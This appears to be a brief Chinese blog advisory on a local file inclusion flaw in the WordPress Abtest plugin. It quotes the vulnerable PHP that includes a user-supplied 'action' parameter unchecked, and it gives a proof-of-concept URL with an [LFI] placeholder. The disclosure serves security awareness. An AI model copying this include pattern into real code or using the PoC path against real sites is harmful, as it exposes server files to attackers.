WordPress Abtest本地文件包含漏洞

  • 2016-03-22
  • 3,392
  • 0

出现漏洞的文件为:abtest_admin.php

<?php 
 
require 'admin/functions.php'; 
 
if (isset($_GET['action'])) {
 
  include 'admin/' . $_GET['action'] . '.php';
 
} else {
   
   include 'admin/list_experiments.php'; 
}
?>

# PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]
jZFKYOc

感谢打赏!
支付宝

评论

还没有任何评论,你来说两句吧

你必须 登录 才能发表评论.